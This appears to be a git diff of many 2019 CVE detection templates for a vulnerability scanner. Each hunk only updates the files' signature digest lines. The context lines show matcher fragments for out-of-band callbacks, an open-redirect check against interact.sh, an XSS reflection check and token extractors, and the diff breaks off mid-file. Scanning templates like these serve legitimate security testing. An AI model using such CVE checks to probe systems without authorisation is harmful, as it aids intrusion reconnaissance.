digest: 4a0a00473045022100e9835e960c185d264844ff6a1c0dcc4461f0848d00e894bb0681a656b4939db90220223530414a1d116e03bae637ebc7a0b6037ac08c0f2daee019cd5fc664d2e36f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221008bc2a6df1ec661a1e058c80095a0bfb21803e5447c6ceb17f9238779c6efbe4902203cb9d1f4f1eaf708d7dd3286ed6feb15b39cf39f9de095868c2341cf5c89b294:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-10758.yaml b/http/cves/2019/CVE-2019-10758.yaml index 7ce8d1d121..23624a316b 100644 --- a/http/cves/2019/CVE-2019-10758.yaml +++ b/http/cves/2019/CVE-2019-10758.yaml @@ -46,4 +46,4 @@ http: part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" -# digest: 4b0a004830460221008b43b36836d54fe57119d7fbc9c2c7bbf83a5c28c40a75eb6347457778a45bc6022100fe8bb104228123301a28b551a1badd14112e0aa18bce53387295571b79c7b827:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a707efd5a953cf498f2407da8a60502b15729c8d513a8cb3e79e4f4f57543a0002206ff1e0d4933305bd33073eb3ca571d6380e0dc8b505e4eaf9d9e0e91e94a231b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-11248.yaml b/http/cves/2019/CVE-2019-11248.yaml index e7c00106fb..788e9a272d 100644 --- a/http/cves/2019/CVE-2019-11248.yaml +++ b/http/cves/2019/CVE-2019-11248.yaml @@ -47,4 +47,4 @@ http: - "Profile Descriptions" - "goroutine profile: total" condition: or -# digest: 4b0a00483046022100fd3a732a5da554e6fb8171ff8f9c6848079e0878dea0e8bf1909ca7be3a448d2022100adf7b0864a3243dd674f556d97fb7a081a16d4ce39b692f5b16f6d35ec27a88f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221008307f1d7a94f3bf164d4fb3a0599e4cf664f8e1c5994402b7151828239d8620c0221009ab7757064a2377254097cea5be5f4f40b96bb2557bdee8b64b829868e174d41:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-11370.yaml b/http/cves/2019/CVE-2019-11370.yaml index 4fd05aa3b9..5930885d19 100644 --- a/http/cves/2019/CVE-2019-11370.yaml +++ b/http/cves/2019/CVE-2019-11370.yaml @@ -51,4 +51,4 @@ http: - status_code_2 == 200 - contains(body_2, 'value=\"\">\">') condition: and -# digest: 4a0a0047304502206211cfa838795769776a00d7ccfcedaa1fe50255fc01e8f945c461b0d2ebc946022100f37746cb8f51e8f7d78c8730d26614a8b2ffc9a7d999c013d5b875cf3568d608:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502201c728c57bdcdc9cd92977cc33c30494b57946183df9ea04437e0df5b41638d89022100cffb3e6dd98eaffb837966fd33cdf1421419846ce3a29c12cdaa671e97f80c05:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-11510.yaml b/http/cves/2019/CVE-2019-11510.yaml index 8b516e4f70..68d3c30a9a 100644 --- a/http/cves/2019/CVE-2019-11510.yaml +++ b/http/cves/2019/CVE-2019-11510.yaml @@ -47,4 +47,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502202dcf9c8572b6ee91dac5f3ab4c1748f9ba06112c38e8ba379b6e68e8eea105f3022100cd34629941d13b282b1e311019a5e8172e4f0a261d94843a22b27fb7a8826159:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502203cb09d5fcff94c6163b87658b3fdc7e6e18e972e859425a541c521543a2e5f2b022100e5e8e743f385d0126a8f435ef7dd64fdf54130d31f622f09bef068fbfc616479:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-11580.yaml b/http/cves/2019/CVE-2019-11580.yaml index 754a2e87d6..05f9053070 100644 --- a/http/cves/2019/CVE-2019-11580.yaml +++ b/http/cves/2019/CVE-2019-11580.yaml @@ -55,4 +55,4 @@ http: part: body_2 words: - "CVE-2019-11580" -# digest: 4b0a0048304602210087955d2448b57d1674ba2fbc9cc961254714818eba35f3288e5a4e190207809a022100d70c8dd4f92da6f2313c05a0892674a2e32c0c3385b8c14e5f18b2586c539e7a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022041cb8583d3f8e34fbfe33e0f61f16e001d07115f9593dfe40982073ffe5f80b8022100d8bb2eec2234f2e5a9dbc238f7012258efb9b891681e9f41bbe8c3e143cb4201:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-11581.yaml b/http/cves/2019/CVE-2019-11581.yaml index a5be14e8d9..89c27951ee 100644 --- a/http/cves/2019/CVE-2019-11581.yaml +++ b/http/cves/2019/CVE-2019-11581.yaml @@ -62,4 +62,4 @@ http: - "\\(v8\\.1\\.[0-1]" - "\\(v8\\.2\\.[0-2]" condition: or -# digest: 4a0a00473045022100b8e0de54aed749444c2182e9e8df595b8e8f1a50ba0d84fee8f9f6208dada7b102201a3f6e5736aacbacc91733a76b2fcb238b12a3bec104a4dcffd701f184768a00:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b5ac1e14381166de97a1fb5d0d4fa2e6d14a5382cf7a596bb2be5dec8b03761202203e1f85de72109b051c2acee04d0edab5ed7a0bb001331179d9357b4cc055e67b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-11869.yaml b/http/cves/2019/CVE-2019-11869.yaml index b5445d9d4e..149005e931 100644 --- a/http/cves/2019/CVE-2019-11869.yaml +++ b/http/cves/2019/CVE-2019-11869.yaml @@ -57,4 +57,4 @@ http: - type: dsl dsl: - "contains(tolower(header_2), 'text/html')" -# digest: 490a0046304402204d1e26a17c4c30a25c984812d74e5863ff9d46141c09b202bb77c1c5e95369a90220692d2ab1de65d05ad3b83a893a6eabc518043b83316e91e6225e9f63f2dcad03:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f262415dcc61709d8131f774eb669f755f68c700968d3fa28706ed6b3e1cef040220617983e4d93971bf21800af6aa075e295f45b1217ea3c05fb47153aefa81d3f9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-12276.yaml b/http/cves/2019/CVE-2019-12276.yaml index b5dc0db698..e61a26d436 100644 --- a/http/cves/2019/CVE-2019-12276.yaml +++ b/http/cves/2019/CVE-2019-12276.yaml @@ -47,4 +47,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100ed5135175a98f71186c5dfe65254ca6307c8c54583b3ef526433db71574580c4022041e92690d7525a07a6120de8ae4ea7462a9868f3772edaf6fe7c8e5b048afd0a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d79827ba491b0d96d375a299b5239c4c2e7065dd9a8f41fdb5b3baeb6690865202203e91ce0af756b9de8bdacf00cf9fe65c9eda47bac6ace557a6924309a40b0947:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-12314.yaml b/http/cves/2019/CVE-2019-12314.yaml index aa7c64d4e5..9433febad9 100644 --- a/http/cves/2019/CVE-2019-12314.yaml +++ b/http/cves/2019/CVE-2019-12314.yaml @@ -44,4 +44,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100b2faeeee543d7c4ff6ad4632ed8ce70fb61371a60376b204ba85deff2bdd0071022100bcf2aa3b7ffcf09b9ddbff16e39f9ae4e5530c95fbbd8ace8f5da573a4b42cf2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f8257d6e12f86661aec5ea17cfa1c2a16cd2b05525986b0c13bb14d13018680a022100e4ce69c9d1d8ffb01a46ef08a0083db051f8f2284ee81bf0c4f29e8ad2ce8006:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-12461.yaml b/http/cves/2019/CVE-2019-12461.yaml index 1700cae404..ba31b35130 100644 --- a/http/cves/2019/CVE-2019-12461.yaml +++ b/http/cves/2019/CVE-2019-12461.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100f9634b71c6a62a98f977a12added6fccaa1c24cf0e75ffb403873dc58ba27913022100eaeb1db10c77254a2093b03dd50f1366f6d6d8a87478eba48cf05b02f8f090db:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f8a68184a00bd30b2c7e8380fe2352c186c6408c83372b7c32cec79a0e41f3b6022029e2365306b2fed019cbf46e02ce63203a3c5e4672286b5e08367bf26cc52b1e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-12581.yaml b/http/cves/2019/CVE-2019-12581.yaml index f374f8f3ba..e699734f44 100644 --- a/http/cves/2019/CVE-2019-12581.yaml +++ b/http/cves/2019/CVE-2019-12581.yaml @@ -54,4 +54,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402202bbcd24325d27b4afa9692a47676116c3e746dac9efb6781eca7200bedd46d5c02203e77b6aa27e9da81a381ac8a93047e7dfe379956ebf9a6b0196e58a7150cb1a7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502207df5ca90186e8dda1fb2ff710a5b1d4faf3c9698a8d966deed30f42731041cba022100f8e38bd0ce4a0a5cd08d6f26c7b53c4797698bc653e1c271e553f9aba66f650f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-12583.yaml b/http/cves/2019/CVE-2019-12583.yaml index f714adf68b..fa0c8c7f05 100644 --- a/http/cves/2019/CVE-2019-12583.yaml +++ b/http/cves/2019/CVE-2019-12583.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100a12874f0ef2733bc8c7f0e764fb0ca6289dcb56f72499b238b27b09caf888bb8022100db48c204ba56cf97ad35c36b148a21decd86e83cd35614cb546190faea932e61:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100da95f96df8b02e3a3ca8944e40f53c435f74bfaa6f293914ad188b043039589f0220689afc3f9f73c9abb15601bdf592167a472181186999990a87fadd16576dd62a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-12593.yaml b/http/cves/2019/CVE-2019-12593.yaml index 12f99354c1..51fcfdcb65 100644 --- a/http/cves/2019/CVE-2019-12593.yaml +++ b/http/cves/2019/CVE-2019-12593.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450221008a481705db6d037ce5f8778e45effa8d6e32a5fb048e8e395ec718c9d093875a022010e39ff22300fc22de65d341cea7fb009e75f65dd8ddba32e9d1b68e6ec722a0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100cb5f9fd84b6fb0218b4458e70c04a15e0a75972da3b7226533adf711515f9f3c022028463f9c2412fb63c6ddfef8c71b84042b08c5a1ee379f741f9e27e242df6d51:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-12616.yaml b/http/cves/2019/CVE-2019-12616.yaml index 0e7cd34023..d5b46be579 100644 --- a/http/cves/2019/CVE-2019-12616.yaml +++ b/http/cves/2019/CVE-2019-12616.yaml @@ -67,4 +67,4 @@ http: group: 1 regex: - '\?v=([0-9.]+)' -# digest: 4b0a00483046022100ff8c851c74b80d9406f46e884bd52022d64db4601ef5803198cc3be69b3aab1602210099243bd82990fc8f8299c10bf31f6090c6abd3cbcf416c953a436b4572c245a7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502201a978d3da6416cf845fa6575bc8896b92b3c928fd8a294c951bc8ace16acef28022100ac39ac8f69ec7f14088bcab163285fa4d9284da85d980928639e63b8e28c252e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-12725.yaml b/http/cves/2019/CVE-2019-12725.yaml index 59b7332699..00af5bacec 100644 --- a/http/cves/2019/CVE-2019-12725.yaml +++ b/http/cves/2019/CVE-2019-12725.yaml @@ -46,4 +46,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502200b2efe0e2b8798d4ea6ed19ab366fd08035ba9c4a905dc24780917aef1054056022100cbb08eedd02bf4914132fae7e4dcd9cdea870b249faec7e52ba313fa00ea30bd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022054afd71335a935e4a0640ae74e7ce38ab1d914a82eac75e251aa9471bbd04ced022100bda3a09ea4eced7e494e91eb2be7defaf99d57859bd03f35cc1247bba2fc6ed2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-12962.yaml b/http/cves/2019/CVE-2019-12962.yaml index 75449b86cc..d930b0f553 100644 --- a/http/cves/2019/CVE-2019-12962.yaml +++ b/http/cves/2019/CVE-2019-12962.yaml @@ -54,4 +54,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220730404803aefaab9552a359a9109e306f61b6f746b25c25c309b98bb2769cc44022100afd816ccce19408b01fe5861f8ea76986010736a6cdc3ffba50658a7a50a73d6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220758d2304b1d699405d3be2d83c3a77d7411cf3cc4eec7a372ee3af9d17db31a6022100bebbb9928d8866af5eee1c336dfc1742c20c210e58b3d8a01e2d77ecdb20a0cb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-12985.yaml b/http/cves/2019/CVE-2019-12985.yaml index 22578c4557..700fcf5769 100644 --- a/http/cves/2019/CVE-2019-12985.yaml +++ b/http/cves/2019/CVE-2019-12985.yaml @@ -53,4 +53,4 @@ http: part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" -# digest: 490a00463044022007073a870a4add30131c5c00b135d70d1a866ff94c73254c7be36d7f69035400022019d693623a03aab5928cdd7c484b47e720fd292ec84beaa923722af625bd5648:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402207123b88063bc8e2764d0cf58dc5194e4a6eae09aacc77f1099eddf1e76f77cf2022074d297a3fc44d70f2be3d0d571a0776957ad0a90d4eb104aa3f88238c832edbd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-12986.yaml b/http/cves/2019/CVE-2019-12986.yaml index 77a1e47e8d..ad13268299 100644 --- a/http/cves/2019/CVE-2019-12986.yaml +++ b/http/cves/2019/CVE-2019-12986.yaml @@ -53,4 +53,4 @@ http: part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" -# digest: 490a0046304402202b0ef3bbb83d1e3a581627f23a46bc39a52ce5065a1b54900ecf212a4377804c0220543b800342938579c7f4f18a4bedd5ea77398f66a0171d9a40d3a1c25678e9ee:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022038de0c0c8b6c31166991b40cb5c2552cfa30480ebe02939ee22118f85b9642740220084c3ccd76fe4098e05901a34cbd4a8bc5c8c22c066135a110ded75f17dbad47:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-12987.yaml b/http/cves/2019/CVE-2019-12987.yaml index 48dc6e03bb..1af5d51a6e 100644 --- a/http/cves/2019/CVE-2019-12987.yaml +++ b/http/cves/2019/CVE-2019-12987.yaml @@ -53,4 +53,4 @@ http: part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" -# digest: 490a0046304402205aba00dc71a461ecf5a2b4d96f029ca13228c3b3bd06050a3c62de6a25f718b50220708eabd18c088a9d7051f3c65bda1a976658e97572d79df298e9a97b73fc899f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d1eda3d9d9c54430c22c449556b1cef412dcc994ef02f327be711ef72d0316a1022050927d61d2e0591a3fdd2609fe475e6bb6cc90724037afc2eeb2e500bcf6a5e8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-12988.yaml b/http/cves/2019/CVE-2019-12988.yaml index e963305f7b..cfaeb96576 100644 --- a/http/cves/2019/CVE-2019-12988.yaml +++ b/http/cves/2019/CVE-2019-12988.yaml @@ -53,4 +53,4 @@ http: part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" -# digest: 4a0a00473045022010a0d4f590ec7df72f845b76afa10bba295cb790b5809a2e8f9ee10f2ce4e675022100ea18957ac1dfad6868cf21d0c21ef9ea8f03951dfc7dc71c1755160935f07d7f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c65b0731bfdc87a270065d149c3b699f09e5e20e70e31a24fe5fbe05b5a149fb02207bdc1cfd101ec33049d00e77bbb0b87c0c053e4a1807abfc5992c61f51b1962a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-12990.yaml b/http/cves/2019/CVE-2019-12990.yaml index 5c7074430f..4029b91e8c 100644 --- a/http/cves/2019/CVE-2019-12990.yaml +++ b/http/cves/2019/CVE-2019-12990.yaml @@ -55,4 +55,4 @@ http: - status_code_3 == 200 - contains(body_1, "Citrix SD-WAN") condition: and -# digest: 4a0a00473045022028d757c9021cfe91970444757763cf2003785713ea9f3602bd768bd83be0f8c3022100c9296bbe6b5d59548f4e8fba22c9ef4b44984f446ca9b44fec7de62e4bc23bea:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100df14dd7c2655786918e861da2f04951923b3dd43d59755ed8e90358bfbe41daf0220762adba19e4499f0eaac470404abf44548576795df891a230b0f3c37dc36f3b1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-13101.yaml b/http/cves/2019/CVE-2019-13101.yaml index fd706d268b..5c7db6f5fb 100644 --- a/http/cves/2019/CVE-2019-13101.yaml +++ b/http/cves/2019/CVE-2019-13101.yaml @@ -46,4 +46,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100c6013aa930559e818c237f42a76be0a2dbdb05aa0aea9954127e7ffa9a3d33000220709875e5f3a3dbc0dea93d6fe4083ffd49bb89ec74a2bc1837766a7ffb3f07b1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022040244b26f38b4723a5f287f4e19182192fcb3046cd463b121034364d816363ba022100fb713221642e83baa1c7d5a9363ca18592ac5739a6d1297e4f3c4b6508f34200:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-13392.yaml b/http/cves/2019/CVE-2019-13392.yaml index 79bf241156..2836208101 100644 --- a/http/cves/2019/CVE-2019-13392.yaml +++ b/http/cves/2019/CVE-2019-13392.yaml @@ -50,4 +50,4 @@ http: part: header words: - text/html -# digest: 4a0a0047304502204a0083256266dd8d7becefcfe7e4bd8c0414418466724a347c0377239fa6dc0e022100c92ebd0d1d745b55423c3bb9239798cf2952282ecb31b43bd738138cab766bbe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202a90e62949af80a7fe37e16afec3f89f92497c78838e9b766674b4b4f591c9c402210089a0c12120b8786cb3e8c8065707e83ffc7559e5b3de7f798d2c9d4a9f5529c9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-13396.yaml b/http/cves/2019/CVE-2019-13396.yaml index bf8dc2a8a4..cdce943da1 100644 --- a/http/cves/2019/CVE-2019-13396.yaml +++ b/http/cves/2019/CVE-2019-13396.yaml @@ -60,4 +60,4 @@ http: - "idden' name='form_token' value='([a-z0-9]+)'>" internal: true part: body -# digest: 4a0a00473045022100f914e78ac71588395cde4bdd71fd9b68becbacd99efa10a46cd8fb336167e4990220063fa341232cdda62f8cf22c6e18aa7a5abd50cc86691eb6dec1c43bedf7749a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220474698615742c3b9befbda0e2bcb85bea35969f6c9f19e2bb2fd6a5cd02d2543022024e1f6e2bfaa043096ff492722e9f66622063a2d97e7fdff5b61c95c200bcd9f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-13462.yaml b/http/cves/2019/CVE-2019-13462.yaml index bfc8baf9d8..3ca03dd2b2 100644 --- a/http/cves/2019/CVE-2019-13462.yaml +++ b/http/cves/2019/CVE-2019-13462.yaml @@ -51,4 +51,4 @@ http: - type: status status: - 500 -# digest: 4a0a00473045022100ec3f40e7d064ff321d16b6306a478441e4bd2090824c5be828f1b87ec01b543a02204a4f41ae7e916c5758d5c246f77bef1c6eb34ce1b06f83db091b1604520f2006:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022070963915130aef214fb2d4fb838c4236cf7e30d11f2515b512f1fdf68339699c02210091125d7256d83a2947a0d88cd3820661299eefd42a962f28efbe63b1581e207e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-14205.yaml b/http/cves/2019/CVE-2019-14205.yaml index ca9333990a..c2d7721967 100644 --- a/http/cves/2019/CVE-2019-14205.yaml +++ b/http/cves/2019/CVE-2019-14205.yaml @@ -48,4 +48,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220498b0deb6290b3abe149ebc78a6303bfbf6b759f3b533adeaa6c2073a0cc5a7a02210083cf5432b2eb0d6876b58392346245ec5b1ff2edf0709d4c034a568a77449c56:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221008ff21687a523a9cb6627dd187316d8522e091a926cb0b2c398a7caa3de9a0f04022100c172ad86c7e42b249dec39a2159c496e7394310ca80c377251c1e0dfaf088071:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-14223.yaml b/http/cves/2019/CVE-2019-14223.yaml index 841dd84ca3..f25070c99f 100644 --- a/http/cves/2019/CVE-2019-14223.yaml +++ b/http/cves/2019/CVE-2019-14223.yaml @@ -44,4 +44,4 @@ http: part: header regex: - "(?m)^(?:Location\\s*:\\s*)(?:https?://|//|\\\\)?(?:[a-zA-Z0-9\\-_]*\\.)?interact\\.sh(?:\\s*)$" -# digest: 4a0a0047304502202d2baa5fcd7264d8391000860e52290c9775cbecac3157c944103a9f049c2a2b022100d869aca527760b3b4fc077408d5c8f83a2078ae647670da0a19bd08ee2e81056:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402205d5f0ef95ddabc2bdbaa24ca65c591518b64e1c5a76acbdd6a4761dc87127fad022024f70af5b612de0111602d874662511ee3f43f639e34344c50ee4178e2f69f7f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-14251.yaml b/http/cves/2019/CVE-2019-14251.yaml index 2220dd470f..d8ba966c27 100644 --- a/http/cves/2019/CVE-2019-14251.yaml +++ b/http/cves/2019/CVE-2019-14251.yaml @@ -45,4 +45,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022040c8eba803c77e52db54922bfde06450c0fb7cc3c0cc1032c3fe822599c9fffc0220233980a4f9b4b7e72fb0ef52d9a6e71da7999a0fa70e891aadb1836f35ac56c1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402200b1a2b0df86f4fec836a803c9f979b0943ec0c3786627bc42d0f31fd7fc03bca02204c1aa89ad91c4c776e3708d673869c99f7312d707e3b67d7c6209ef4841a62d1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-14312.yaml b/http/cves/2019/CVE-2019-14312.yaml index 3859d0338b..ef47745414 100644 --- a/http/cves/2019/CVE-2019-14312.yaml +++ b/http/cves/2019/CVE-2019-14312.yaml @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100aab45aec7b5e9cde37325bcc63c6be994f606ab29a9c85364fa96f07dd3ca56e022072d7b6a72c706f3ab71b6391b1e398c13d229ec23acf42b1ca94e3e69df1c04a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220211914185787cdf387be2c26e25c18b7706cd88637ba4411c897d8017a5c249e02210095bbedfb97962c663e883378ed5a7661bd11e8f802bf0cb70c7ea56e86c5bd7f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-14322.yaml b/http/cves/2019/CVE-2019-14322.yaml index 82691a077a..2ba58eff87 100644 --- a/http/cves/2019/CVE-2019-14322.yaml +++ b/http/cves/2019/CVE-2019-14322.yaml @@ -53,4 +53,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220218490a21dc880778c576c05647488c68c62afe30f3cb08dee65084b629e9f3d022014789c5926f043dbbd6d7f2d04fced324050966e0a076a57bf587f4dd9297f0b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402203873fcabe92d5432e4a3a367df497ad11b8075f2c1dfbe3b469969af9114744902205461a9fb6bf86145db766b0dd2935ff057620e015bcb51a43c836a4f4e6291b6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-14530.yaml b/http/cves/2019/CVE-2019-14530.yaml index f73c464c93..75074e1d65 100644 --- a/http/cves/2019/CVE-2019-14530.yaml +++ b/http/cves/2019/CVE-2019-14530.yaml @@ -63,4 +63,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220581dc7f9af0e6819134169343d3902a8c4ca36a9c1794b2bdc3da5fabbe6729002210093bc4a3b29b79ac4bcf1e1922164adf7f0e82eca386e7de5af62c4a228587ce5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d4130fb1b77b9e6ee1a29b2c6d5479765ab5b0d271d62634e50ba19053b61e6a02207bd80e0f22b1dd469d044b7b50a9930d04015e00b7fc3cb45feed0620ae85673:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-14696.yaml b/http/cves/2019/CVE-2019-14696.yaml index e8850b212d..90b9ea6ddc 100644 --- a/http/cves/2019/CVE-2019-14696.yaml +++ b/http/cves/2019/CVE-2019-14696.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022021c34366a64cbfdefebecb4aa4f7c353eea5fdc366066e809cb883b1b48eebfa022037201460a13c29307875ac704248267640de95a2ab5743fdca89234c2bde1126:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402206f8c5af4ccb804ce6eba9057c9d69d997e1ed37ba31cab8162c1b0e3e447c7cc022039fd15233f3f3dea200778731385446974efe8c83efaf5a3113c8b9273a20094:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-14750.yaml b/http/cves/2019/CVE-2019-14750.yaml index 8fec196e82..6a212be265 100644 --- a/http/cves/2019/CVE-2019-14750.yaml +++ b/http/cves/2019/CVE-2019-14750.yaml @@ -87,4 +87,4 @@ http: regex: - '__CSRFToken__" value="(.*?)"' internal: true -# digest: 4a0a004730450221009eeb1aecb7f7ee802cfd019bdbb9f81f98886ef6692f3c8883999696d0f6b8e302201d37fff5e31a6f4d57613523ed67d21d2c9c7c50cbb556cfe44e0907928f1003:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022065e66061da2caa14a4e28a20337513d3ed25486793432ac88f25c11f0ecb26b2022100d8c5b725a5ad3584280960a822d372fb3a42dcb18bf179f67d8cd3af94f99995:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-14789.yaml b/http/cves/2019/CVE-2019-14789.yaml index 08e26250cf..6c726c3933 100644 --- a/http/cves/2019/CVE-2019-14789.yaml +++ b/http/cves/2019/CVE-2019-14789.yaml @@ -50,4 +50,4 @@ http: - 'contains(body_2, "")' - 'contains(body_2, "Custom 404 Pro")' condition: and -# digest: 4a0a00473045022100f868cbc5ff74801e824e4721f229eb4edaebfaefdde075bae4c07c4d2123145202202a8a32c4eb6a0c0c1683beb54270a0af67a0d0aa825c5c2043739a93cb305c7e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100bcc2bda6a9772bf00724aef8ea1e14be069dcd1b5329641d80e3612067c1aeef022063ccdde02fc45ecdb2fccb786f860f06ef162fd3572c88d3af98b8706774fd7d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-14974.yaml b/http/cves/2019/CVE-2019-14974.yaml index faed20e703..20802e8eb1 100644 --- a/http/cves/2019/CVE-2019-14974.yaml +++ b/http/cves/2019/CVE-2019-14974.yaml @@ -47,4 +47,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100dd8b9c31ee67de53e39882df442d6306fac9c898795ec467e416db1958f59c8d022034bc65db7f8f0e389da72f21bc1e04230739416df27a216080067c12d3a2953e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220668bac552ce913a0fc436cba7429eede12ac09c4483d4bbe26286cd5cf2ce1db022039b2d6bb669068335ec43954f445fee03dc63174c5e551ec0d3eb60fdbb90a86:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-15043.yaml b/http/cves/2019/CVE-2019-15043.yaml index a61ed1018a..b8c995b875 100644 --- a/http/cves/2019/CVE-2019-15043.yaml +++ b/http/cves/2019/CVE-2019-15043.yaml @@ 